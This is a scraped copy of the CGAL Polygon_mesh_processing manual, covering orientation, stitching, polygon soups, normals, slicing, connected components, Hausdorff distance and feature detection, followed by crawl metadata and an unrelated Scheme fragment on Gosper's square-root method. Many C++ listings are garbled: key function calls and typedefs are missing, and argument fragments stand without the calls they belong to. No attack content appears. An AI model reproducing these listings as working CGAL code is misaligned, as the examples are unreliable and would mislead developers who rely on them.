\"data/eight.off\";\nstd::ifstream input(filename);\nPolyhedron poly;\nif (!input || !(input >> poly) || poly.empty()\n{\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\ndouble size = max_coordinate(poly);\nunsigned int nb_points = 100;\nstd::vector<Point> points;\npoints.reserve(nb_points);\nCGAL::Random_points_in_cube_3<Point> gen(size);\nfor (unsigned int i = 0; i < nb_points; ++i)\npoints.push_back(*gen++);\nstd::cout << \"Test \" << nb_points << \" random points in cube \"\n<< \"[-\" << size << \"; \" << size <<\"]\" << std::endl;\nint nb_inside = 0;\nint nb_boundary = 0;\nfor (std::size_t i = 0; i < nb_points; ++i)\n{\nCGAL::Bounded_side res = inside(points[i]);\nif (res == CGAL::ON_BOUNDED_SIDE) { ++nb_inside; }\nif (res == CGAL::ON_BOUNDARY) { ++nb_boundary; }\n}\nstd::cerr << \"Total query size: \" << points.size() << std::endl;\nstd::cerr << \" \" << nb_inside << \" points inside \" << std::endl;\nstd::cerr << \" \" << nb_boundary << \" points on boundary \" << std::endl;\nstd::cerr << \" \" << points.size() - nb_inside - nb_boundary << \" points outside \" << std::endl;\nreturn 0;\n}\n\n## Intersections Detection\n\nIntersection tests between triangle meshes and/or polylines can be done using CGAL::Polygon_mesh_processing::do_intersect() . 
Additionally, the function CGAL::Polygon_mesh_processing::intersecting_meshes() records all pairs of intersecting meshes in a range.\n\n# Orientation\n\nThis package provides functions dealing with the orientation of faces in a closed polygon mesh.\n\nThe function CGAL::Polygon_mesh_processing::is_outward_oriented() checks whether an oriented polygon mesh is oriented such that the normals to all faces are oriented towards the outside of the domain bounded by the input polygon mesh.\n\nThe function CGAL::Polygon_mesh_processing::reverse_face_orientations() reverses the orientation of halfedges around faces. As a consequence, the normal computed for each face (see Section Computing Normals) is also reversed.\n\nThe Polygon Soup Example puts these functions at work on a polygon soup.\n\nThe function CGAL::Polygon_mesh_processing::orient() makes each connected component of a closed polygon mesh outward or inward oriented.\n\nThe function CGAL::Polygon_mesh_processing::orient_to_bound_a_volume() orients the connected components of a closed polygon mesh so that it bounds a volume (see Definitions for the precise definition).\n\n# Combinatorial Repairing\n\n## Stitching\n\nIt happens that a polygon mesh has several edges and vertices that are duplicated. For those edges and vertices, the connectivity of the mesh is incomplete, if not considered incorrect.\n\nStitching the borders of such a polygon mesh consists in two main steps. First, border edges that are similar but duplicated are detected and paired. Then, they are \"stitched\" together so that the edges and vertices duplicates are removed from the mesh, and each of these remaining edges is incident to exactly two faces.\n\nThe function CGAL::Polygon_mesh_processing::stitch_borders() performs such repairing operation. The input mesh should be manifold. Otherwise, stitching is not guaranteed to succeed.\n\n### Stitching Example\n\nThe following example applies the stitching operation to a simple quad mesh with duplicated border edges.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/stitch_borders.h>\n#include <iostream>\n#include <fstream>\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/full_border_quads.off\";\nstd::ifstream input(filename);\nPolyhedron mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\nstd::cout << \"Before stitching : \" << std::endl;\nstd::cout << \"\\t Number of vertices :\\t\" << mesh.size_of_vertices() << std::endl;\nstd::cout << \"\\t Number of halfedges :\\t\" << mesh.size_of_halfedges() << std::endl;\nstd::cout << \"\\t Number of facets :\\t\" << mesh.size_of_facets() << std::endl;\nstd::cout << \"Stitching done : \" << std::endl;\nstd::cout << \"\\t Number of vertices :\\t\" << mesh.size_of_vertices() << std::endl;\nstd::cout << \"\\t Number of halfedges :\\t\" << mesh.size_of_halfedges() << std::endl;\nstd::cout << \"\\t Number of facets :\\t\" << mesh.size_of_facets() << std::endl;\nstd::ofstream output(\"mesh_stitched.off\");\noutput << std::setprecision(17) << mesh;\nreturn 0;\n}\n\n## Polygon Soups\n\nWhen the faces of a polygon mesh are given but the connectivity is unknown, we must deal with of a polygon soup.\n\nBefore running any of the algorithms on the so-called polygon soup, one should ensure that the polygons are consistently oriented. 
To do so, this package provides the function CGAL::Polygon_mesh_processing::orient_polygon_soup(), described in .\n\nTo deal with polygon soups that cannot be converted to a combinatorial manifold surface, some points are duplicated. Because a polygon soup does not have any connectivity (each point has as many occurences as the number of polygons it belongs to), duplicating one point (or a pair of points) amounts to duplicate the polygon to which it belongs.\n\nThe duplicated points are either an endpoint of an edge incident to more than two polygons, an endpoint of an edge between two polygons with incompatible orientations (during the re-orientation process), or more generally a point p at which the intersection of an infinitesimally small ball centered at p with the polygons incident to it is not a topological disk.\n\nOnce the polygon soup is consistently oriented, with possibly duplicated (or more) points, the connectivity can be recovered and made consistent to build a valid polygon mesh. The function CGAL::Polygon_mesh_processing::polygon_soup_to_polygon_mesh() performs this mesh construction step.\n\n### Polygon Soup Example\n\nThis example shows how to generate a mesh from a polygon soup. The first step is to get a soup of consistently oriented faces, before rebuilding the connectivity. In this example, some orientation tests are performed on the output polygon mesh to illustrate Section Orientation.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/orient_polygon_soup.h>\n#include <CGAL/Polygon_mesh_processing/polygon_soup_to_polygon_mesh.h>\n#include <CGAL/Polygon_mesh_processing/orientation.h>\n#include <vector>\n#include <fstream>\n#include <iostream>\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/tet-shuffled.off\";\nstd::ifstream input(filename);\nif (!input)\n{\nstd::cerr << \"Cannot open file \" << std::endl;\nreturn 1;\n}\nstd::vector<K::Point_3> points;\nstd::vector< std::vector<std::size_t> > polygons;\n{\nstd::cerr << \"Error parsing the OFF file \" << std::endl;\nreturn 1;\n}\nPolyhedron mesh;\nstd::ofstream out(\"tet-oriented1.off\");\nout << mesh;\nout.close();\nstd::ofstream out2(\"tet-oriented2.off\");\nout2 << mesh;\nout2.close();\nreturn 0;\n}\n\n# Computing Normals\n\nThis package provides methods to compute normals on the polygon mesh. The normal can either be computed for each single face, or estimated for each vertex, as the average of its incident face normals. These computations are performed with :\n\n• CGAL::Polygon_mesh_processing::compute_face_normal()\n• CGAL::Polygon_mesh_processing::compute_vertex_normal()\n\nWe further provide functions to compute all the normals to faces, or to vertices, or to both :\n\n• CGAL::Polygon_mesh_processing::compute_face_normals()\n• CGAL::Polygon_mesh_processing::compute_vertex_normals()\n• CGAL::Polygon_mesh_processing::compute_normals().\n\nProperty maps are used to record the computed normals.\n\n## Normals Computation Examples\n\nProperty maps are an API introduced in the boost library, that allows to associate values to keys. 
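For readers unfamiliar with property maps, here is a small sketch showing the two usual ways of obtaining such a map for face normals: an internal property map added to a Surface_mesh, and an external std::map wrapped with boost::associative_property_map. It is not taken from the manual; the property name "f:normals" and the value types are arbitrary choices.

#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>
#include <CGAL/Surface_mesh.h>
#include <boost/property_map/property_map.hpp>
#include <map>
typedef CGAL::Exact_predicates_inexact_constructions_kernel K;
typedef K::Vector_3 Vector;
typedef CGAL::Surface_mesh<K::Point_3> Mesh;
typedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;
int main()
{
  Mesh mesh;
  // (1) a property map stored inside the Surface_mesh itself;
  //     add_property_map() returns a (map, was_created) pair
  Mesh::Property_map<face_descriptor, Vector> fnormals =
    mesh.add_property_map<face_descriptor, Vector>("f:normals", CGAL::NULL_VECTOR).first;
  // (2) an external std::map wrapped as a property map
  //     (this is the style used for Polyhedron_3, which has no internal storage)
  std::map<face_descriptor, Vector> fnormal_storage;
  boost::associative_property_map< std::map<face_descriptor, Vector> >
    fnormal_pmap(fnormal_storage);
  (void)fnormals; (void)fnormal_pmap; // silence unused-variable warnings
  return 0;
}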
In the following examples we associate a normal vector to each vertex and to each face.\n\n### Normals Computation for a Surface Mesh\n\nThe following example illustrates how to compute the normals to faces and vertices and store them in property maps provided by the class Surface_mesh.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/compute_normal.h>\n#include <iostream>\n#include <fstream>\ntypedef K::Point_3 Point;\ntypedef K::Vector_3 Vector;\ntypedef CGAL::Surface_mesh<Point> Surface_mesh;\ntypedef boost::graph_traits<Surface_mesh>::vertex_descriptor vertex_descriptor;\ntypedef boost::graph_traits<Surface_mesh>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nSurface_mesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\n(\"f:normals\", CGAL::NULL_VECTOR).first;\n(\"v:normals\", CGAL::NULL_VECTOR).first;\nvnormals,\nfnormals,\nCGAL::Polygon_mesh_processing::parameters::vertex_point_map(mesh.points()).\ngeom_traits(K()));\nstd::cout << \"Face normals :\" << std::endl;\nfor(face_descriptor fd: faces(mesh)){\nstd::cout << fnormals[fd] << std::endl;\n}\nstd::cout << \"Vertex normals :\" << std::endl;\nfor(vertex_descriptor vd: vertices(mesh)){\nstd::cout << vnormals[vd] << std::endl;\n}\nreturn 0;\n}\n\n### Normals Computation for a Poyhedron_3\n\nThe following example illustrates how to compute the normals to faces and vertices and store them in ordered or unordered maps as the class Polyhedron does not provide storage for the normals.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/compute_normal.h>\n#include <boost/property_map/property_map.hpp>\n#include <map>\n// #include <CGAL/Unique_hash_map.h>\n// #include <boost/unordered_map.hpp>\n#include <iostream>\n#include <fstream>\ntypedef K::Point_3 Point;\ntypedef K::Vector_3 Vector;\ntypedef CGAL::Polyhedron_3<K> Polyhedron;\ntypedef boost::graph_traits<Polyhedron>::vertex_descriptor vertex_descriptor;\ntypedef boost::graph_traits<Polyhedron>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nPolyhedron mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\nstd::map<face_descriptor,Vector> fnormals;\nstd::map<vertex_descriptor,Vector> vnormals;\n// Instead of std::map you may use std::unordered_map, boost::unordered_map\n// or CGAL::Unique_hash_map\n// CGAL::Unique_hash_map<face_descriptor,Vector> fnormals;\n// boost::unordered_map<vertex_descriptor,Vector> vnormals;\nboost::make_assoc_property_map(vnormals),\nboost::make_assoc_property_map(fnormals));\nstd::cout << \"Face normals :\" << std::endl;\nfor(face_descriptor fd: faces(mesh)){\nstd::cout << fnormals[fd] << std::endl;\n}\nstd::cout << \"Vertex normals :\" << std::endl;\nfor(vertex_descriptor vd: vertices(mesh)){\nstd::cout << vnormals[vd] << std::endl;\n}\nreturn 0;\n}\n\n# Slicer\n\nThe CGAL::Polygon_mesh_slicer is an operator that intersects a triangle surface mesh with a plane. It records the intersection as a set of polylines since the intersection can be made of more than one connected component. 
The degenerate case where the intersection is a single point is handled.\n\nFigure 60.9 shows the polylines returned by the slicing operation for a triangle mesh and a set of parallel planes.", null, "Figure 60.9 Slicing a mesh. A triangle mesh (left) and the polylines computed by the mesh slicer by intersecting a set of parallel planes (right).\n\n## Slicer Example\n\nThe example below illustrates how to use the mesh slicer for a given triangle mesh and a plane. Two constructors are used in the example for pedagogical purposes.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/AABB_halfedge_graph_segment_primitive.h>\n#include <CGAL/AABB_tree.h>\n#include <CGAL/AABB_traits.h>\n#include <CGAL/Polygon_mesh_slicer.h>\n#include <fstream>\ntypedef std::vector<K::Point_3> Polyline_type;\ntypedef std::list< Polyline_type > Polylines;\ntypedef CGAL::AABB_traits<K, HGSP> AABB_traits;\ntypedef CGAL::AABB_tree<AABB_traits> AABB_tree;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/eight.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\n// Slicer constructor from the mesh\nPolylines polylines;\nslicer(K::Plane_3(0, 0, 1, -0.4), std::back_inserter(polylines));\nstd::cout << \"At z = 0.4, the slicer intersects \"\n<< polylines.size() << \" polylines\" << std::endl;\npolylines.clear();\nslicer(K::Plane_3(0, 0, 1, 0.2), std::back_inserter(polylines));\nstd::cout << \"At z = -0.2, the slicer intersects \"\n<< polylines.size() << \" polylines\" << std::endl;\npolylines.clear();\n// Use the Slicer constructor from a pre-built AABB_tree\nAABB_tree tree(edges(mesh).first, edges(mesh).second, mesh);\nCGAL::Polygon_mesh_slicer<Mesh, K> slicer_aabb(mesh, tree);\nslicer_aabb(K::Plane_3(0, 0, 1, -0.4), std::back_inserter(polylines));\nstd::cout << \"At z = 0.4, the slicer intersects \"\n<< polylines.size() << \" polylines\" << std::endl;\npolylines.clear();\nreturn 0;\n}\n\n# Connected Components\n\nThis package provides functions to enumerate and store the connected components of a polygon mesh. The connected components can be either closed and geometrically separated, or separated by border or user-specified constraint edges.\n\nFirst, the function CGAL::Polygon_mesh_processing::connected_component() collects all the faces that belong to the same connected component as the face that is given as a parameter.\n\nThen, CGAL::Polygon_mesh_processing::connected_components() collects all the connected components, and fills a property map with the indices of the different connected components.\n\nThe functions CGAL::Polygon_mesh_processing::keep_connected_components() and CGAL::Polygon_mesh_processing::remove_connected_components() enable the user to keep and remove only a selection of connected components, provided either as a range of faces that belong to the desired connected components or as a range of connected component ids (one or more per connected component).\n\nFinally, CGAL::Polygon_mesh_processing::keep_largest_connected_components() enables the user to keep only the largest connected components. This feature can for example be useful for noisy data were small connected components should be discarded in favour of major connected components.\n\n## Connected Components Example\n\nThe first example shows how to record the connected components of a polygon mesh. 
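Before the detailed examples, here is a minimal sketch of the simplest of these calls; it is not one of the shipped examples, and the input file and typedefs are assumptions matching the listings below. It keeps only the largest connected component and discards everything else.

#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>
#include <CGAL/Surface_mesh.h>
#include <CGAL/Polygon_mesh_processing/connected_components.h>
#include <fstream>
#include <iostream>
typedef CGAL::Exact_predicates_inexact_constructions_kernel K;
typedef CGAL::Surface_mesh<K::Point_3> Mesh;
namespace PMP = CGAL::Polygon_mesh_processing;
int main()
{
  Mesh mesh;
  std::ifstream input("data/blobby_3cc.off");
  if (!input || !(input >> mesh) || mesh.is_empty())
  {
    std::cerr << "Not a valid off file." << std::endl;
    return 1;
  }
  // keep the single largest connected component, remove all others
  PMP::keep_largest_connected_components(mesh, 1);
  mesh.collect_garbage(); // Surface_mesh keeps removed elements until garbage collection
  std::ofstream output("largest_cc.off");
  output << mesh;
  return 0;
}

Coming back to the first example announced above: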
In particular, we provide an example for the optional parameter EdgeConstraintMap, a property map that returns information about an edge being a constraint or not. A constraint provides a mean to demarcate the border of a connected component, and prevents the propagation of a connected component index to cross it.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/connected_components.h>\n#include <boost/function_output_iterator.hpp>\n#include <boost/property_map/property_map.hpp>\n#include <boost/foreach.hpp>\n#include <iostream>\n#include <fstream>\n#include <map>\ntypedef Kernel::Point_3 Point;\ntypedef Kernel::Compare_dihedral_angle_3 Compare_dihedral_angle_3;\ntemplate <typename G>\nstruct Constraint : public boost::put_get_helper<bool,Constraint<G> >\n{\ntypedef typename boost::graph_traits<G>::edge_descriptor edge_descriptor;\ntypedef bool value_type;\ntypedef bool reference;\ntypedef edge_descriptor key_type;\nConstraint()\n:g_(NULL)\n{}\nConstraint(G& g, double bound)\n: g_(&g), bound_(bound)\n{}\nbool operator[](edge_descriptor e) const\n{\nconst G& g = *g_;\nreturn compare_(g.point(source(e, g)),\ng.point(target(e, g)),\ng.point(target(next(halfedge(e, g), g), g)),\ng.point(target(next(opposite(halfedge(e, g), g), g), g)),\nbound_) == CGAL::SMALLER;\n}\nconst G* g_;\nCompare_dihedral_angle_3 compare_;\ndouble bound_;\n};\ntemplate <typename PM>\nstruct Put_true\n{\nPut_true(const PM pm)\n:pm(pm)\n{}\ntemplate <typename T>\nvoid operator()(const T& t)\n{\nput(pm, t, true);\n}\nPM pm;\n};\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/blobby_3cc.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\nconst double bound = std::cos(0.75 * CGAL_PI);\nstd::vector<face_descriptor> cc;\nface_descriptor fd = *faces(mesh).first;\nmesh,\nstd::back_inserter(cc));\nstd::cerr << \"Connected components without edge constraints\" << std::endl;\nstd::cerr << cc.size() << \" faces in the CC of \" << fd << std::endl;\n// Instead of writing the faces into a container, you can set a face property to true\ntypedef Mesh::Property_map<face_descriptor, bool> F_select_map;\nF_select_map fselect_map =\nmesh,\nboost::make_function_output_iterator(Put_true<F_select_map>(fselect_map)));\nstd::cerr << \"\\nConnected components with edge constraints (dihedral angle < 3/4 pi)\" << std::endl;\nMesh::Property_map<face_descriptor, std::size_t> fccmap =\nstd::size_t num = PMP::connected_components(mesh,\nfccmap,\nPMP::parameters::edge_is_constrained_map(Constraint<Mesh>(mesh, bound)));\nstd::cerr << \"- The graph has \" << num << \" connected components (face connectivity)\" << std::endl;\ntypedef std::map<std::size_t/*index of CC*/, unsigned int/*nb*/> Components_size;\nComponents_size nb_per_cc;\nBOOST_FOREACH(face_descriptor f , faces(mesh)){\nnb_per_cc[ fccmap[f] ]++;\n}\nBOOST_FOREACH(const Components_size::value_type& cc, nb_per_cc){\nstd::cout << \"\\t CC #\" << cc.first\n<< \" is made of \" << cc.second << \" faces\" << std::endl;\n}\nstd::cerr << \"- We keep only components which have at least 4 faces\" << std::endl;\n4,\nPMP::parameters::edge_is_constrained_map(Constraint<Mesh>(mesh, bound)));\nstd::cerr << \"- We keep the two largest components\" << 
std::endl;\n2,\nPMP::parameters::edge_is_constrained_map(Constraint<Mesh>(mesh, bound)));\nreturn 0;\n}\n\nThe second example shows how to use the class template Face_filtered_graph which enables to treat one or several connected components as a face graph.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/connected_components.h>\n#include <CGAL/boost/graph/Face_filtered_graph.h>\n#include <boost/property_map/property_map.hpp>\n#include <boost/foreach.hpp>\n#include <iostream>\n#include <fstream>\n#include <map>\ntypedef Kernel::Point_3 Point;\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\ntypedef boost::graph_traits<Mesh>::faces_size_type faces_size_type;\ntypedef Mesh::Property_map<face_descriptor, faces_size_type> FCCmap;\ntypedef CGAL::Face_filtered_graph<Mesh> Filtered_graph;\nint main(int argc, char* argv[])\n{\nstd::ifstream input((argc > 1) ? argv : \"data/blobby_3cc.off\");\nMesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\nfaces_size_type num = PMP::connected_components(mesh,fccmap);\nstd::cerr << \"- The graph has \" << num << \" connected components (face connectivity)\" << std::endl;\nFiltered_graph ffg(mesh, 0, fccmap);\nstd::cout << \"The faces in component 0 are:\" << std::endl;\nBOOST_FOREACH(boost::graph_traits<Filtered_graph>::face_descriptor f, faces(ffg)){\nstd::cout << f << std::endl;\n}\nif(num>1){\nstd::vector<faces_size_type> components;\ncomponents.push_back(0);\ncomponents.push_back(1);\nffg.set_selected_faces(components, fccmap);\nstd::cout << \"The faces in components 0 and 1 are:\" << std::endl;\nBOOST_FOREACH(Filtered_graph::face_descriptor f, faces(ffg)){\nstd::cout << f << std::endl;\n}\n}\nreturn 0;\n}\n\n# Approximate Hausdorff Distance\n\nThis package provides methods to compute (approximate) distances between meshes and point sets.\n\nThe function approximate_Hausdorff_distance() computes an approximation of the Hausdorff distance from a mesh tm1 to a mesh tm2. Given a a sampling of tm1, it computes the distance to tm2 of the farthest sample point to tm2 . The symmetric version (approximate_symmetric_Hausdorff_distance()) is the maximum of the two non-symmetric distances. Internally, points are sampled using sample_triangle_mesh() and the distance to each sample point is computed using max_distance_to_triangle_mesh(). The quality of the approximation depends on the quality of the sampling and the runtime depends on the number of sample points. Three sampling methods with different parameters are provided (see Figure 60.10).", null, "Figure 60.10 Sampling of a triangle mesh using different sampling methods. From left to right: (a) Grid sampling, (b) Monte-Carlo sampling with fixed number of points per face and per edge, (c) Monte-Carlo sampling with a number of points proportional to the area/length, and (d) Uniform random sampling. The four pictures represent the sampling on the same portion of a mesh, parameters were adjusted so that the total number of points sampled in faces (blue points) and on edges (red points) are roughly the same. Note that when using the random uniform sampling some faces/edges may not contain any point, but this method is the only one that allows to exactly match a given number of points.\n\nThe function approximate_max_distance_to_point_set() computes an approximation of the Hausdorff distance from a mesh to a point set. 
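A minimal sketch of its use follows; it is not a shipped example, and the input file, the query points and the precision value (the same value as in the reconstruction example quoted below) are my own choices.

#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>
#include <CGAL/Surface_mesh.h>
#include <CGAL/Polygon_mesh_processing/distance.h>
#include <vector>
#include <fstream>
#include <iostream>
typedef CGAL::Exact_predicates_inexact_constructions_kernel K;
typedef K::Point_3 Point;
typedef CGAL::Surface_mesh<Point> Mesh;
namespace PMP = CGAL::Polygon_mesh_processing;
int main()
{
  Mesh tm;
  std::ifstream input("data/eight.off");
  if (!input || !(input >> tm))
  {
    std::cerr << "Not a valid off file." << std::endl;
    return 1;
  }
  std::vector<Point> points;
  points.push_back(Point(0., 0., 0.));
  points.push_back(Point(0.1, 0.2, 0.3));
  // the last argument is the precision parameter of the approximation
  double d = PMP::approximate_max_distance_to_point_set(tm, points, 4000);
  std::cout << "Approximate max distance to point set: " << d << std::endl;
  return 0;
}

The refinement strategy used internally by this function is summarized next.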
For each triangle, a lower and upper bound of the Hausdorff distance to the point set are computed. Triangles are refined until the difference between the bounds is lower than a user-defined precision threshold.\n\n## Approximate Hausdorff Distance Example\n\nIn the following example, a mesh is isotropically remeshed and the approximate distance between the input and the output is computed.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/distance.h>\n#include <CGAL/Polygon_mesh_processing/remesh.h>\n#define TAG CGAL::Parallel_tag\n#else\n#define TAG CGAL::Sequential_tag\n#endif\ntypedef K::Point_3 Point;\nint main()\n{\nMesh tm1, tm2;\nCGAL::make_tetrahedron(Point(.0,.0,.0),\nPoint(2,.0,.0),\nPoint(1,1,1),\nPoint(1,.0,2),\ntm1);\ntm2=tm1;\nstd::cout << \"Approximated Hausdorff distance: \"\n<TAG>(tm1, tm2, PMP::parameters::number_of_points_per_area_unit(4000))\n<< std::endl;\n}\n\n## Max Distance Between Point Set and Surface Example\n\nIn Poisson_surface_reconstruction_3/poisson_reconstruction_example.cpp, a triangulated surface mesh is constructed from a point set using the Poisson reconstruction algorithm , and the distance between the point set and the reconstructed surface is computed with the following code:\n\n// computes the approximation error of the reconstruction\ndouble max_dist =\npoints,\n4000);\nstd::cout << \"Max distance to point_set: \" << max_dist << std::endl;\n\n# Feature Detection\n\nThis package provides methods to detect some features of a polygon mesh.\n\nThe function CGAL::Polygon_mesh_processing::sharp_edges_segmentation() detects the sharp edges of a polygon mesh and deduces surface patches and vertices incidences. It can be split into three functions : CGAL::Polygon_mesh_processing::detect_sharp_edges(), CGAL::Polygon_mesh_processing::connected_components() and CGAL::Polygon_mesh_processing::detect_vertex_incident_patches(), that respectively detect the sharp edges, compute the patch indices, and give each of pmesh vertices the patch indices of its incident faces.\n\n## Feature Detection Example\n\nIn the following example, we count how many edges of pmesh are incident to two faces which normals form an angle smaller than 90 degrees, and the number of surface patches that are separated by these edges.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/detect_features.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? 
argv : \"data/P.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh))\n{\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\ntypedef boost::property_map<Mesh, CGAL::edge_is_feature_t>::type EIFMap;\ntypedef boost::property_map<Mesh, CGAL::face_patch_id_t<int> >::type PIMap;\ntypedef boost::property_map<Mesh, CGAL::vertex_incident_patches_t<int> >::type VIMap;\nEIFMap eif = get(CGAL::edge_is_feature, mesh);\nPIMap pid = get(CGAL::face_patch_id_t<int>(), mesh);\nVIMap vip = get(CGAL::vertex_incident_patches_t<int>(), mesh);\nstd::size_t number_of_patches\n= PMP::sharp_edges_segmentation(mesh, 90, eif, pid,\nPMP::parameters::vertex_incident_patches_map(vip));\nstd::size_t nb_sharp_edges = 0;\nBOOST_FOREACH(boost::graph_traits<Mesh>::edge_descriptor e, edges(mesh))\n{\nif(get(eif, e))\n++nb_sharp_edges;\n}\nstd::cout<<\"This mesh contains \"<<nb_sharp_edges<<\" sharp edges\"<<std::endl;\nstd::cout<<\" and \"<<number_of_patches<<\" surface patches.\"<<std::endl;\nreturn 0;\n}\n\n# Implementation History\n\nA first version of this package was started by Ilker O. Yaz and Sébastien Loriot. Jane Tournois worked on the finalization of the API, code, and documentation." ]
[ null, "https://doc.cgal.org/4.12/Manual/search/mag_sel.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/neptun_head.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/iso_remeshing.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/corefine.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/bounded_vols.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/bool_op.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/mech_hole_horz.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/fork.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/elephants-with-holes.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/selfintersections.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/slicer.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/pmp_sampling_bunny.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69382524,"math_prob":0.8532378,"size":57052,"snap":"2022-05-2022-21","text_gpt3_token_len":13686,"char_repetition_ratio":0.17252138,"word_repetition_ratio":0.15798439,"special_character_ratio":0.2482472,"punctuation_ratio":0.23769924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911741,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-18T15:26:25Z\",\"WARC-Record-ID\":\"<urn:uuid:019f8d10-3eb0-4f2d-a594-300724f50354>\",\"Content-Length\":\"175284\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8d00c692-d162-4528-a6ab-58a27d2061e2>\",\"WARC-Concurrent-To\":\"<urn:uuid:076618c2-a6b4-4236-8186-6ed3191952d6>\",\"WARC-IP-Address\":\"213.186.33.40\",\"WARC-Target-URI\":\"https://doc.cgal.org/4.12/Polygon_mesh_processing/index.html\",\"WARC-Payload-Digest\":\"sha1:KSMTGRN6ES2OGXN7VLKNJDYYNK2OQAIR\",\"WARC-Block-Digest\":\"sha1:DFVQY34VPCBJC2ALRCQNFS4HJ5332TSK\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662522284.20_warc_CC-MAIN-20220518151003-20220518181003-00518.warc.gz\"}"}
https://funcall.blogspot.com/2014/08/
[ "## Wednesday, August 27, 2014\n\n### A use of Newton's method\n\nI've seen more than one book claim that computing with real numbers inevitably involves round-off errors because real numbers can have an infinite number of digits after the decimal point and no finite representation can hold them. This is false. Instead of representing a real number as a nearby rational number with an error introduced by rounding, we'll represent a real number as computer program that generates the digits. The number of digits generated is potentially infinite, but the program that generates them is definitely finite.\n\nHere is Gosper's algorithm for computing the square root of a rational number.\n```(define (gosper-sqrt a b c d)\n;; Solve for\n;; ax + b\n;; ------ = x\n;; cx + d\n(define (newtons-method f f-prime guess)\n(let ((dy (f guess)))\n(if (< (abs dy) 1)\nguess\n(let ((dy/dx (f-prime guess)))\n(newtons-method f f-prime (- guess (/ dy dy/dx)))))))\n\n(define (f x)\n(+ (* c x x)\n(* (- d a) x)\n(- b)))\n\n(define (f-prime x)\n(+ (* 2 c x)\n(- d a)))\n\n(let ((value (floor (newtons-method f f-prime b))))\n(cons-stream 